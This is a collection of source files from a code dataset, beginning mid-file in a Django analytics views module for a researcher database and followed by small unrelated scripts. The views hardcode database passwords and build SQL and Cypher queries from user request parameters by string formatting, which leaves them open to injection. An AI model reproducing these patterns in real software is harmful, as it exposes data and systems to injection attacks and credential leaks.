defaultdict\nfrom py2neo import Graph, Relationship, NodeMatcher, Node\nfrom django.contrib.postgres.search import SearchVector\nfrom django.contrib.auth import get_user_model\nfrom account.models import Profile\n\nUser = get_user_model()\n\ngraph = Graph(host='neo4j_db', password='_genius01_', scheme='bolt')\n\nmeta = MetaData()\nengine = create_engine('postgresql+psycopg2://postgres:_genius01_@postgres_db/keywordsdw')\nconn = engine.connect()\n\npub_engine = create_engine('postgresql+psycopg2://postgres:_genius01_@postgres_db/pubdw')\npubconn = pub_engine.connect()\n\nResearcher = namedtuple('Researcher', ['id', 'firstname', 'lastname',\n 'word_en', 'count', 'affiliation',\n 'total_abstract' ,'sc'])\n\n# Create your views here.\ndef res_list(request):\n search_term = request.GET.get('q')\n res_list = []\n nounchunks = []\n if search_term:\n if len(search_term.split(' ')) > 1:\n tsquery = ' & '.join(search_term.split(' '))\n tsquery_word = ' | '.join(search_term.split(' '))\n else:\n tsquery = search_term\n tsquery_word = search_term\n query = (\"select id, chunk_en from noun_chunks where \"\n \"to_tsvector(chunk_en) @@ to_tsquery('%s');\")\n nounchunks += conn.execute(query % tsquery).fetchall()\n results = conn.execute(\"select distinct keywords.id, first_name, last_name, word_en, count, 
affils.name\"\n \" from keywords inner join affils on keywords.affil_scopus_id=affils.scopus_id \"\n \"where to_tsvector(word_en) @@ to_tsquery('%s')\"\n \" order by count desc\" % tsquery_word).fetchall()\n if results:\n for rec in results:\n query = ('select count(*) from abstracts inner join abstract_has_keywords '\n 'on abstract_has_keywords.abstract_id=abstracts.id '\n 'inner join keywords on keywords.id=abstract_has_keywords.keyword_id '\n 'where keywords.id=%d;')\n total_abstract = conn.execute(query % int(rec[0])).scalar()\n\n fname = rec[1].replace(\"'\", \"\\'\") if rec[1] else ''\n lname = rec[2].replace(\"'\", \"\\'\") if rec[2] else ''\n\n query = (\"select id,scholarship_info_id from authors where lower(first_name)=lower(%s) \"\n \"and lower(last_name)=lower(%s)\")\n _author = conn.execute(query, (fname, lname)).fetchone()\n if _author:\n _author_id, _sc_id = _author[0], _author[1]\n if _author_id:\n if _sc_id:\n sc = True\n else:\n sc = False\n res_list.append(Researcher(_author_id, rec[1], rec[2], rec[3], rec[4], rec[5], total_abstract, sc))\n\n\n profiles = {}\n for word in search_term.split(' '):\n for p in Profile.objects.annotate(\n search=SearchVector('field_of_interest')).filter(search=word):\n field_of_interest = (f.strip() for f in p.field_of_interest.split(','))\n profiles[p.user.username] = (p.user.first_name, p.user.last_name, field_of_interest)\n\n authors = []\n query = (\"select id, first_name,last_name from authors where \"\n \"lower(first_name)=lower(%s) or lower(last_name)=lower(%s);\")\n for id, first_name, last_name in conn.execute(query, (search_term,search_term)):\n authors.append((id,first_name,last_name))\n\n return render(request, template_name='analytics/res_list.html',\n context={'search_term': search_term, 'results': res_list,\n 'nounchunks': nounchunks, 'profiles': profiles,\n 'authors': authors})\n\ndef noun_chunk_detail(request):\n nc_id = request.GET.get('ncid')\n abstracts_list = []\n if nc_id:\n nc = conn.execute('select chunk_en from noun_chunks where id=%d' % int(nc_id)).fetchone()[0]\n query = (\"select abstracts.id, title_en, pub_date, cited from abstracts \"\n \"inner join abstract_has_nounchunk \"\n \"on abstract_has_nounchunk.abstract_id=abstracts.id \"\n \"inner join noun_chunks on noun_chunks.id=abstract_has_nounchunk.noun_chunk_id \"\n \"where noun_chunks.id=%d;\")\n for rec in conn.execute(query % int(nc_id)).fetchall():\n _bag = {'abstract': rec}\n _bag['authors'] = conn.execute(\"select authors.* from abstracts inner join abstract_has_author \"\n \"on abstract_has_author.abstract_id=abstracts.id inner join \"\n \"authors on abstract_has_author.author_id=authors.id where abstracts.id=%d;\"\n % int(rec[0])).fetchall()\n _bag['nounchunks'] = conn.execute(\"select noun_chunks.* from abstracts inner join abstract_has_nounchunk \"\n \"on abstract_has_nounchunk.abstract_id=abstracts.id inner join \"\n \"noun_chunks on abstract_has_nounchunk.noun_chunk_id=noun_chunks.id where abstracts.id=%d;\"\n % int(rec[0])).fetchall()\n abstracts_list.append(_bag)\n\n else:\n nc = ''\n return render(request, template_name='analytics/nounchunk_abs.html',\n context={'noun_chunk': nc, 'abstracts': abstracts_list})\n\ndef show_profile(request, author_id):\n degrees = {1: 'Bachelor', 2: 'Master', 3: 'Doctorate'}\n author = conn.execute('select * from authors where id=%s' % author_id).fetchone()\n profile = conn.execute('select * from scholarship_info where scholarship_info.id=%d'\n % author.scholarship_info_id).fetchone()\n author_scopus_id = author[3]\n 
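# Added note: index 3 is assumed to be the scopus_id column of the authors row;\n # other views read it by name (author.scopus_id), which is less brittle.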
if author:\n query = (\"select word_en from keywords where author_scopus_id='%s'\" % author_scopus_id)\n results = conn.execute(query).fetchall()\n keywords = []\n for rec in results:\n keywords.append(rec[0])\n\n query = (\"select abstracts.id,abstracts.title_en from abstracts inner join abstract_has_author \"\n \"on abstract_has_author.abstract_id=abstracts.id inner join \"\n \"authors on abstract_has_author.author_id=authors.id \"\n \"where authors.id=%s\" % author_id)\n abstracts = conn.execute(query).fetchall()\n fields = defaultdict(int)\n for abstract in abstracts:\n query = (\"select name from research_fields inner join field_has_abstract on \"\n \"field_has_abstract.field_id=research_fields.id inner join \"\n \"abstracts on field_has_abstract.abstract_id=abstracts.id \"\n \"where abstracts.id=%d\" % int(abstract[0]))\n results = conn.execute(query).fetchall()\n for f in results:\n fields[f[0]] += 1\n fields.default_factory = None\n return render(request, template_name=\"analytics/profile.html\",\n context={'author': author,\n 'abstracts': abstracts,\n 'profile': profile,\n 'degree': degrees.get(int(profile.degree), 'Other'),\n 'fields': fields,\n 'keywords': keywords})\n\n\ndef main_db(request):\n total_words = conn.execute('select count(*) from keywords').scalar()\n total_abstracts = conn.execute('select count(*) from abstracts').scalar()\n fields = []\n query = ('select count(*), name from research_fields inner join '\n 'field_has_abstract on field_has_abstract.field_id=research_fields.id group by name;')\n for field in conn.execute(query).fetchall():\n fields.append(field)\n\n fields = sorted(fields, key=lambda x: x[0], reverse=True)\n return render(request, template_name=\"analytics/main.html\",\n context={'total_words': total_words,\n 'total_abstracts': total_abstracts,\n 'fields': fields\n })\n\n\ndef show_field(request, field_name):\n query = 'MATCH (f:Field{name:\"%s\"})-[:IN]-(:Abstract)-[:AUTHORED]-(au:Author)-[:AFFILIATE]-(af:Affiliation{country:\"Thailand\"}) RETURN f,au,af' % field_name\n results = list(graph.run(query))\n authors = []\n if results:\n for res in results:\n authors.append((res['au'], res['af']))\n return render(request, template_name=\"analytics/field_author.html\",\n context={'authors': authors, 'field': field_name})\n\ndef show_profile_by_name(request):\n first_name = request.GET.get('firstname', '')\n last_name = request.GET.get('lastname', '')\n first_name = first_name.replace(\"'\", \"\\'\") if first_name else first_name\n last_name = last_name.replace(\"'\", \"\\'\") if last_name else last_name\n degrees = {1: 'Bachelor', 2: 'Master', 3: 'Doctorate'}\n if first_name and last_name:\n author = conn.execute(\"select * from authors where \"\n \"lower(first_name)=lower(%s) and lower(last_name)=lower(%s)\",\n (first_name, last_name)).fetchone()\n if author:\n if author.scholarship_info_id:\n profile = conn.execute('select * from scholarship_info where scholarship_info.id=%d'\n % author.scholarship_info_id).fetchone()\n degree = degrees.get(profile.degree, '')\n else:\n profile = None\n degree = ''\n keywords = conn.execute(\"select word_en,count from keywords where author_scopus_id='%s'\"\n % author.scopus_id).fetchall()\n keywords = set([(kw.word_en,kw.count) for kw in keywords])\n keywords = sorted(keywords, key=lambda x: x[1], reverse=True)\n query = (\"select abstracts.id,abstracts.title_en \"\n \"from abstracts inner join abstract_has_author \"\n \"on abstract_has_author.abstract_id=abstracts.id inner join \"\n \"authors on 
abstract_has_author.author_id=authors.id \"\n \"where authors.id=%s\" % author.id)\n abstracts = conn.execute(query).fetchall()\n fields = defaultdict(int)\n for abstract in abstracts:\n query = (\"select name from research_fields inner join field_has_abstract on \"\n \"field_has_abstract.field_id=research_fields.id inner join \"\n \"abstracts on field_has_abstract.abstract_id=abstracts.id \"\n \"where abstracts.id=%d\" % int(abstract[0]))\n results = conn.execute(query).fetchall()\n for f in results:\n fields[f[0]] += 1\n fields.default_factory = None\n query = (\"select name, country, year from affil_history inner join affils \"\n \"on affils.id=affiliation_id where author_id=%s;\" % author.id)\n affiliations = set((tuple(af) for af in conn.execute(query).fetchall()))\n affiliations = sorted(affiliations, key=lambda x: x[2])\n\n return render(request, template_name=\"analytics/profile_by_name.html\",\n context={'author': author, 'abstracts': abstracts,\n 'fields': fields, 'affils': affiliations,\n 'keywords': keywords, 'profile': profile,\n 'degree': degree})\n return render(request, template_name=\"analytics/profile_by_name.html\",\n context={})\n\n\ndef show_abstract(request, abstract_id):\n if abstract_id:\n abstract = conn.execute(\"select * from abstracts where id=%s;\" % abstract_id).fetchone()\n if abstract:\n authors = conn.execute(\"select authors.* from abstracts inner join abstract_has_author \"\n \"on abstract_has_author.abstract_id=abstracts.id inner join \"\n \"authors on abstract_has_author.author_id=authors.id where abstracts.id=%s;\"\n % abstract_id).fetchall()\n keywords = conn.execute(\"select * from keywords inner join abstract_has_keywords \"\n \"on abstract_has_keywords.keyword_id=keywords.id inner join \"\n \"abstracts on abstract_has_keywords.abstract_id=abstracts.id \"\n \"where abstracts.id=%s\" % abstract_id).fetchall()\n keywords = set([kw.word_en for kw in keywords])\n print(keywords)\n return render(request, template_name='analytics/abstract.html',\n context={'authors': authors, 'abstract': abstract, 'keywords': keywords})\n return render(request, template_name='analytics/abstract.html',\n context={'authors': [], 'abstract': None})\n\n\ndef show_abstract_per_person(request):\n data = []\n for rec in conn.execute(\" select status, count(*) as c from scholarship_info group by status;\"):\n data.append(rec[1])\n return JsonResponse({'data': data})\n\ndef get_num_active_scholar_studs(request):\n actives = {}\n totals = {}\n sqlquery = ('select affil,count(*) as c from active_scholar_students '\n 'inner join scholarship_info on scholarship_info_id=scholarship_info.id '\n 'where scholarship_info.status=true '\n 'group by affil order by c desc limit 30;')\n for affil, cnt in conn.execute(sqlquery):\n actives[affil] = cnt\n\n sqlquery = ('select affil,count(*) as c from scholarship_info '\n 'where scholarship_info.status=true '\n 'group by affil;')\n\n active_data = []\n inactive_data = []\n labels = []\n activecolors = []\n inactivecolors = []\n for affil, cnt in conn.execute(sqlquery):\n totals[affil] = cnt\n\n sorted_active_data = sorted([(k,v) for k,v in actives.items()],\n key=lambda x: x[1], reverse=True)\n for k,v in sorted_active_data:\n active_data.append(actives[k])\n inactive_data.append(totals[k] - actives[k])\n activecolors.append('rgb(199,0,57)')\n inactivecolors.append('rgb(100,116,164)')\n labels.append(k)\n\n return JsonResponse({'actives': active_data,\n 'inactives': inactive_data,\n 'activecolors': activecolors,\n 'inactivecolors': 
inactivecolors,\n 'labels': labels})\n\n\ndef get_abstract_fields(request):\n sqlquery = ('select abbr,count(*) as c from field_has_abstract '\n 'inner join research_fields on research_fields.id=field_has_abstract.field_id '\n 'inner join abstracts on field_has_abstract.abstract_id=abstracts.id '\n 'where abstracts.pub_date>\\'2013-01-01\\' '\n 'group by abbr order by c desc;')\n data = []\n labels = []\n backgroundColors = []\n for f,n in conn.execute(sqlquery):\n data.append(n)\n labels.append(f)\n backgroundColors.append('rgb(100,116,164)')\n\n return JsonResponse({'data': data, 'labels': labels, 'backgroundColors': backgroundColors})\n\n\ndef get_researcher_by_field(request):\n inactive_counts = defaultdict(int)\n active_counts = defaultdict(int)\n\n all_researchers = defaultdict(dict)\n sqlquery = ('select authors.id,research_fields.abbr,count(research_fields.abbr) as num_papers from field_has_abstract inner join research_fields on field_has_abstract.field_id=research_fields.id '\n 'inner join abstract_has_author on abstract_has_author.abstract_id=field_has_abstract.abstract_id '\n 'inner join authors on authors.id=abstract_has_author.author_id '\n 'inner join scholarship_info on scholarship_info.id=authors.scholarship_info_id '\n 'where scholarship_info.status=true '\n 'group by authors.id,abbr '\n 'order by authors.id,num_papers desc;')\n for auth_id, field_abbr, num_papers in conn.execute(sqlquery):\n if auth_id not in all_researchers:\n all_researchers[auth_id] = field_abbr\n\n active_researchers = set()\n sqlquery = 'select author_id from active_scholar_students;'\n for row in conn.execute(sqlquery):\n active_researchers.add(row[0])\n\n\n for auth_id in all_researchers:\n if auth_id in active_researchers:\n active_counts[all_researchers[auth_id]] += 1\n else:\n inactive_counts[all_researchers[auth_id]] += 1\n\n actives = []\n inactives = []\n labels = []\n activecolors = []\n inactivecolors = []\n data = [(k,v) for k,v in active_counts.items()]\n sorted_fields = [k for k,v in sorted(data,key=lambda x: x[1], reverse=True)]\n for field in sorted_fields:\n actives.append(active_counts[field])\n inactives.append(inactive_counts[field])\n labels.append(field)\n activecolors.append('rgb(199,0,57)')\n inactivecolors.append('rgb(100,116,164)')\n\n return JsonResponse({'actives': actives, 'inactives': inactives,\n 'labels': labels,\n 'activecolors': activecolors,\n 'inactivecolors': inactivecolors})\n\n\ndef get_scholar_joined_tm_ratio(request):\n sqlquery = ('select count(*) as c from tm_researcher_profile;')\n total_tm = conn.execute(sqlquery).scalar()\n sqlquery = ('select count(*) as c from tm_researcher_profile '\n 'where scholarship_info_id is not NULL')\n total_scholar = conn.execute(sqlquery).scalar()\n return JsonResponse({'data': [total_scholar, total_tm],\n 'labels': ['scholarship', 'non-scholarship']})\n\n\ndef get_num_active_scholar_tm(request):\n actives = {}\n totals = {}\n sqlquery = ('select affil,count(*) as c from scholarship_info '\n 'inner join tm_researcher_profile on tm_researcher_profile.scholarship_info_id=scholarship_info.id '\n 'where scholarship_info.status=true '\n 'group by affil order by c desc limit 30;')\n for affil, cnt in conn.execute(sqlquery):\n actives[affil] = cnt\n\n sqlquery = ('select affil,count(*) as c from scholarship_info '\n 'where scholarship_info.status=true '\n 'group by affil;')\n\n active_data = []\n inactive_data = []\n labels = []\n activecolors = []\n inactivecolors = []\n for affil, cnt in conn.execute(sqlquery):\n totals[affil] = 
cnt\n\n sorted_active_data = sorted([(k,v) for k,v in actives.items()],\n key=lambda x: x[1], reverse=True)\n for k,v in sorted_active_data:\n active_data.append(actives[k])\n inactive_data.append(totals[k] - actives[k])\n activecolors.append('rgb(199,0,57)')\n inactivecolors.append('rgb(100,116,164)')\n labels.append(k)\n\n return JsonResponse({'actives': active_data,\n 'inactives': inactive_data,\n 'activecolors': activecolors,\n 'inactivecolors': inactivecolors,\n 'labels': labels})\n\n\ndef get_activeness_scholar_tm(request):\n tm_actives = {}\n totals = {}\n sqlquery = ('select affil,count(*) as c from active_scholar_students '\n 'inner join scholarship_info on active_scholar_students.scholarship_info_id=scholarship_info.id '\n 'inner join tm_researcher_profile on tm_researcher_profile.scholarship_info_id=active_scholar_students.scholarship_info_id '\n 'where scholarship_info.status=true '\n 'group by affil;')\n for affil, cnt in conn.execute(sqlquery):\n tm_actives[affil] = cnt\n\n sqlquery = ('select affil,count(*) as c from scholarship_info '\n 'inner join tm_researcher_profile on tm_researcher_profile.scholarship_info_id=scholarship_info.id '\n 'where scholarship_info.status=true '\n 'group by affil;')\n\n labels = []\n inactive_data = []\n active_data = []\n activecolors = []\n inactivecolors = []\n for affil, cnt in conn.execute(sqlquery):\n totals[affil] = cnt\n\n sorted_active_data = sorted([(k,v) for k,v in totals.items()],\n key=lambda x: x[1], reverse=True)\n for k,v in sorted_active_data:\n if k in tm_actives:\n inactive_data.append(totals[k]-tm_actives[k])\n active_data.append(tm_actives[k])\n activecolors.append('rgb(199,0,57)')\n inactivecolors.append('rgb(100,116,164)')\n labels.append(k)\n\n return JsonResponse({'actives': active_data,\n 'inactives': inactive_data,\n 'activecolors': activecolors,\n 'inactivecolors': inactivecolors,\n 'labels': labels})\n\n\ndef get_tm_researchers_graph_data(request):\n sqlquery = ('select authors.id from authors '\n 'inner join scholarship_info on authors.scholarship_info_id=scholarship_info.id '\n 'where scholarship_info.status=true')\n\n scholars = set()\n for row in conn.execute(sqlquery):\n scholars.add(row[0])\n\n\n sqlquery = ('select authors.id, abstracts.id from scholarship_info '\n 'inner join tm_researcher_profile on tm_researcher_profile.scholarship_info_id=scholarship_info.id '\n 'inner join authors on scholarship_info.id=authors.scholarship_info_id '\n 'inner join abstract_has_author on abstract_has_author.author_id=authors.id '\n 'inner join abstracts on abstract_has_author.abstract_id=abstracts.id '\n 'where scholarship_info.status=true '\n )\n\n tm_abstracts = set()\n tm_authors = set()\n for author_id, abstract_id in conn.execute(sqlquery):\n tm_abstracts.add(abstract_id)\n tm_authors.add(author_id)\n\n sqlquery = ('select authors.id,authors.first_name, authors.last_name,abstracts.id from abstracts '\n 'inner join abstract_has_author on abstract_has_author.abstract_id=abstracts.id '\n 'inner join authors on abstract_has_author.author_id=authors.id;'\n )\n abstracts = {}\n for author_id, first_name, last_name, abstract_id in conn.execute(sqlquery):\n if abstract_id in tm_abstracts:\n if abstract_id in abstracts:\n abstracts[abstract_id].append((author_id, '{} {}'.format(first_name, last_name)))\n else:\n abstracts[abstract_id] = [(author_id, '{} {}'.format(first_name, last_name))]\n\n edges = {}\n nodes = {}\n n = 0\n for abstract_id, authors in abstracts.items():\n n += 1\n first_author_id = authors[0][0]\n if 
first_author_id not in nodes:\n nodes[first_author_id] = {'name': authors[0][1], 'papers': 1}\n else:\n nodes[first_author_id]['papers'] += 1\n if first_author_id not in edges:\n edges[first_author_id] = {}\n if len(authors) > 1:\n for author in authors[1:]:\n if author[0] not in nodes:\n nodes[author[0]] = {'name': author[1], 'papers': 1}\n else:\n nodes[author[0]]['papers'] += 1\n if author[0] in edges and edges[author[0]].get(first_author_id, None):\n continue\n else:\n edges[first_author_id][author[0]] = edges[first_author_id].get(author[0], 0) + 1\n\n nodes_data = []\n edges_data = []\n flt_nodes = set()\n for n in nodes:\n if nodes[n]['papers'] > 2:\n flt_nodes.add(n)\n if n in tm_authors:\n color = '#ff9900'\n elif n in scholars:\n color = '#33cc33'\n else:\n color = '#0099ff'\n nodes_data.append({\n 'id': n,\n 'value': nodes[n]['papers'],\n 'label': nodes[n]['name'],\n 'color': color\n })\n for _from in list(flt_nodes):\n for _to in edges.get(_from, []):\n if edges[_from][_to] >= 1:\n edges_data.append({\n 'from': _from,\n 'to': _to,\n 'value': edges[_from][_to],\n 'title': '{} publications'.format(edges[_from][_to])\n })\n if _to not in flt_nodes:\n if _to in tm_authors:\n color = '#ff9900'\n elif _to in scholars:\n color = '#33cc33'\n else:\n color = '#0099ff'\n nodes_data.append({\n 'id': _to,\n 'value': nodes[_to]['papers'],\n 'label': nodes[_to]['name'],\n 'color': color\n })\n flt_nodes.add(_to)\n\n\n return JsonResponse({'edges': edges_data, 'nodes': nodes_data})\n\n\ndef show_scholar_dashboard(request):\n return render(request, template_name=\"analytics/scholar-dashboard.html\",\n context={'board': 'scholar'})\n\ndef show_gjb_dashboard(request):\n return render(request, template_name=\"analytics/gjb-dashboard.html\",\n context={'board': 'gjb'})\n\ndef show_tm_dashboard(request):\n return render(request, template_name=\"analytics/tm-dashboard.html\",\n context={'board': 'tm'})\n\ndef show_network_dashboard(request):\n return render(request, template_name=\"analytics/network-dashboard.html\",\n context={'board': 'network'})\n\ndef count_gjb_by_status(request):\n data = []\n sqlquery = (\"select count(*), finished from gjb_researcher_profile inner join gjb_theses on gjb_researcher_profile.id=gjb_theses.researcher_id group by finished\")\n for rec in conn.execute(sqlquery):\n data.append(rec[0])\n return JsonResponse({'data': data})\n\ndef count_gjb_by_status_affil(request):\n data = []\n sqlquery = (\"select count(*),finished, university_th from gjb_researcher_profile as gp \"\n \"inner join gjb_theses on gjb_theses.researcher_id=gp.id \"\n \"group by finished,university_th order by university_th\")\n labels = []\n unfinished_data = []\n finished_data = []\n finished_colors = []\n unfinished_colors = []\n finished_dict = defaultdict(int)\n unfinished_dict = defaultdict(int)\n for cnt, finished, affil in conn.execute(sqlquery):\n if finished:\n finished_dict[affil] += cnt\n else:\n unfinished_dict[affil] += cnt\n\n sorted_finished_data = sorted([(k,v) for k,v in finished_dict.items()],\n key=lambda x: x[1], reverse=True)\n for k,v in sorted_finished_data:\n unfinished_data.append(unfinished_dict[k])\n finished_data.append(finished_dict[k])\n finished_colors.append('rgb(199,0,57)')\n unfinished_colors.append('rgb(100,116,164)')\n labels.append(k)\n\n return JsonResponse({'actives': finished_data,\n 'inactives': unfinished_data,\n 'activecolors': finished_colors,\n 'inactivecolors': unfinished_colors,\n 'labels': labels})\n\ndef count_active_gjb_researcher(request):\n 
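# A researcher with a finished GJB thesis counts as 'active' for their\n # university when at least one row in recent_pubs matches their lowercased\n # first/last name; everyone else with a finished thesis counts as inactive.\n 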
active_university_dict = defaultdict(int)\n inactive_university_dict = defaultdict(int)\n total_university_dict = defaultdict(int)\n for res in conn.execute(\n 'select * from gjb_researcher_profile as gp inner join gjb_theses on gjb_theses.researcher_id=gp.id where gjb_theses.finished=TRUE'):\n uni = res[11]\n total_university_dict[uni] += 1\n if res[5] and res[6]:\n first_name, last_name = res[5].lower(), res[6].lower()\n sqlquery = \"select * from recent_pubs where lower(first_name)='%s' and lower(last_name)='%s'\" % (\n first_name, last_name)\n total_pubs = list(pubconn.execute(sqlquery))\n if len(total_pubs) > 0:\n active_university_dict[uni] += 1\n for uni in total_university_dict:\n inactive_university_dict[uni] = total_university_dict[uni] - active_university_dict[uni]\n\n sorted_active_data = sorted([(k,v) for k,v in active_university_dict.items()],\n key=lambda x: x[1], reverse=True)\n active_data = []\n inactive_data = []\n active_colors = []\n inactive_colors = []\n labels = []\n for k,v in sorted_active_data:\n active_data.append(active_university_dict[k])\n inactive_data.append(inactive_university_dict[k])\n active_colors.append('rgb(199,0,57)')\n inactive_colors.append('rgb(100,116,164)')\n labels.append(k)\n\n return JsonResponse({'actives': active_data,\n 'inactives': inactive_data,\n 'activecolors': active_colors,\n 'inactivecolors': inactive_colors,\n 'labels': labels})\n\ndef count_gjb_pub_by_field(request):\n fields = defaultdict(int)\n sc_fields = defaultdict(int)\n for res in conn.execute(\"select * from gjb_researcher_profile as gp \"\n \"inner join gjb_theses on gjb_theses.researcher_id=gp.id \"\n \"where gjb_theses.finished=TRUE\"):\n if res[5] and res[6]:\n first_name, last_name = res[5].lower(), res[6].lower()\n sqlquery = (\"select * from recent_pubs where lower(first_name)='%s' \"\n \"and lower(last_name)='%s'\") % (first_name, last_name)\n for rec in pubconn.execute(sqlquery):\n field = rec[3]\n fields[field] += 1\n\n\n gjb_counts = []\n sqlquery = ('select abbr,count(*) as c from field_has_abstract '\n 'inner join research_fields on research_fields.id=field_has_abstract.field_id '\n 'inner join abstracts on field_has_abstract.abstract_id=abstracts.id '\n 'where abstracts.pub_date>\\'2013-01-01\\' '\n 'group by abbr order by c desc;')\n sc_counts = []\n labels = []\n for f,n in conn.execute(sqlquery):\n sc_fields[f] += n\n\n for field in fields:\n labels.append(field)\n gjb_counts.append(fields[field])\n sc_counts.append(sc_fields[field])\n\n\n return JsonResponse({'gjb_counts': gjb_counts, 'labels': labels, 'sc_counts': sc_counts})\n\n","sub_path":"web/code/tm/analytics/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":30799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"142980084","text":"import random\n\nBOARD = ['a1', 'a2', 'a3', 'b1', 'b2', 'b3', 'c1', 'c2', 'c3']\nwin = [['a1', 'a2', 'a3'], ['b1', 'b2', 'b3'], ['c1', 'c2', 'c3'], ['a1', 'b1', 'c1'], ['a2', 'b2', 'c2'], ['a3', 'b3', 'c3'], ['a1', 'b2', 'c3'], ['a3', 'b2', 'c1']]\n\ndef minimax(ox, oz, depth, level, player):\n if depth == 0: \n for pos in win:\n ok = 1\n for i in pos:\n if not (i in ox):\n ok = 0\n break \n if ok == 1: \n return 1 if player else -1\n ok = 1\n for i in pos:\n if not(i in oz):\n ok = 0\n break\n if ok == 1:\n return 1 if player == False else -1\n return 0\n alfa = -1000\n available = list( set(BOARD) - set(ox) - set(oz) )\n for child in available:\n if level == False:\n oz_=oz[:]\n 
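# copy the minimising player's squares and apply the candidate move before\n # recursing; the leading minus on the recursive call is the negamax convention\n 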
oz_.append(child)\n alfa = max(alfa, -minimax(ox, oz_, depth-1, not(level), player))\n else:\n ox_=ox[:]\n ox_.append(child)\n alfa = max(alfa, -minimax(ox_, oz, depth-1, not(level), player))\n return alfa\n \n \n\ndef play_turn(\n player_role,\n owned_by_x,\n owned_by_zero\n ):\n\n #print player_role, owned_by_x, owned_by_zero\n available_squares = list( set(BOARD) - set(owned_by_x) - set(owned_by_zero) )\n best1=-1; best2=1;\n el = BOARD[0]\n for i in available_squares:\n if player_role == 'x':\n x = owned_by_x[:]\n x.append(i)\n # score the board with the candidate move applied; the opponent moves next\n mini = minimax(x,owned_by_zero,len(available_squares)-1,False,True)\n if mini > best1:\n best1 = mini\n el = i\n else: \n z = owned_by_zero[:]\n z.append(i)\n # score the board with the candidate move applied; the opponent moves next\n mini = minimax(owned_by_x,z,len(available_squares)-1,True,False)\n if mini < best2:\n best2 = mini\n el = i\n return el\n #return random.choice(available_squares)\n\n","sub_path":"tictactoe/adibranescu/tictactoe_play_turn.py","file_name":"tictactoe_play_turn.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"206761772","text":"import qrcode\n\nqr = qrcode.QRCode(\n version=5,\n box_size=5,\n border=2\n)\ndata = 'www.billavamsikrishna.co'\nqr.add_data(data)\nqr.make(fit=True)\nimg = qr.make_image(fill_color='green',back_color='white')\nimg.save('vamsi.png')\n","sub_path":"Making a py qr code/qrcodevamsi.py","file_name":"qrcodevamsi.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"24499598","text":"n_max = 150 # maximum number of resistors in the network\ncnt = 0\nprint (\"======= Resistor network calculation =========\")\nvalue = (float)(input(\"value of the fixed resistor: \"))\nobj_value = (float)(input(\"desired resistor value: \"))\nobj_err = (float)(input(\"maximum resistance error: \"))\n\nprint (\"**********************************************************************\")\nprint(\"\")\nfor p in range(1,n_max):\n for s2 in range(1,n_max):\n for s1 in range(1,n_max):\n n=s1*s2*p\n if(n <= n_max):\n res = ((value * s1)/p)*s2\n error = abs(obj_value - res) \n if error < obj_err:\n print (\"Value: %.3f, Error = %.3f, N = %i, s1 = %i, s2 = %i, p = %i\" %(res,error,n,s1,s2,p))\n cnt = cnt + 1\nprint(\"\")\nprint (\"**********************************************************************\")\nprint (\"Possible combinations: %i\" %(cnt))\nprint(\"\")\nprint(\"\")\n","sub_path":"res.py","file_name":"res.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"262914079","text":"from .dialog_manager_super import DialogManagerBase\n\n\nclass TelegramDialogManager(DialogManagerBase):\n\n def initialize_episode(self):\n \"\"\" Refresh state for new dialog \"\"\"\n\n super().initialize_episode()\n self.user.initialize_episode()\n self.agent.initialize_episode()\n\n def next_turn(self, message):\n \"\"\" This function initiates each subsequent exchange between agent and user (user first) \"\"\"\n\n ########################################################################\n # CALL USER TO TAKE HER TURN\n ########################################################################\n\n user_action = self.user.next(message)\n self.state_tracker.update(user_action=user_action)\n\n ########################################################################\n # CALL AGENT TO TAKE HER TURN\n 
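# (the state tracker condenses the dialog history into the representation\n # consumed by the agent policy below)\n 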
########################################################################\n\n agent_state = self.state_tracker.get_state_for_agent()\n agent_action = self.agent.state_to_action(agent_state)\n\n ########################################################################\n # Register AGENT action with the state_tracker\n ########################################################################\n self.state_tracker.update(agent_action=agent_action)\n\n self.agent.add_nl_to_action(agent_action)\n agent_ans = agent_action['act_slot_response']['nl']\n\n if user_action['diaact'] == \"thanks\":\n agent_ans = 'Thank you, good bye!'\n self.episode_over = True\n\n return self.episode_over, agent_ans","sub_path":"src/deep_dialog/dialog_system/dialog_manager_telegram.py","file_name":"dialog_manager_telegram.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"36054575","text":"#!/usr/bin/env python\n#-*-coding:utf-8-*-\n# author:lwz\n\nstr = \"loveleetcode\"\n\nclass Solution:\n def firstUniqChar(self, s):\n obj, min = {}, len(s)\n for i, j in enumerate(s):\n if j in obj:\n obj[j].append(i)\n else:\n obj.setdefault(j, [i])\n for i in obj:\n if len(obj[i]) == 1:\n min = obj[i][0] if obj[i][0] < min else min\n if min == len(s):\n return -1\n return min\n\nsolution = Solution()\nmin = solution.firstUniqChar(str)\nprint(min)","sub_path":"Week 08/id_524/LeetCode_387_524.py","file_name":"LeetCode_387_524.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"623726666","text":"\"\"\"Uses the [adiabatic] local density approximation ([A]LDA) to calculate the [time-dependent] \nelectron density [and current] for a system of N electrons.\n\nComputes approximations to V_KS, V_H, V_xc using the LDA self-consistently. For ground state \ncalculations the code outputs the LDA orbitals and energies of the system, the ground-state \ncharge density and Kohn-Sham potential. For time dependent calculations the code also outputs \nthe time-dependent charge and current densities and the time-dependent Kohn-Sham potential.\n\nNote: Uses the LDAs developed in [Entwistle2018]_ from finite slab systems and the HEG, \nin one dimension.\n\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport copy\nimport numpy as np\nimport scipy as sp\nimport scipy.sparse as sps\nimport scipy.linalg as spla\nimport scipy.sparse.linalg as spsla\n\nfrom . import LDA_parameters\nfrom . import RE_cython\nfrom . import results as rs\nfrom . import mix\nfrom . import minimize\n\n\ndef groundstate(pm, H):\n r\"\"\"Calculates the ground-state of the system for a given potential.\n\n .. 
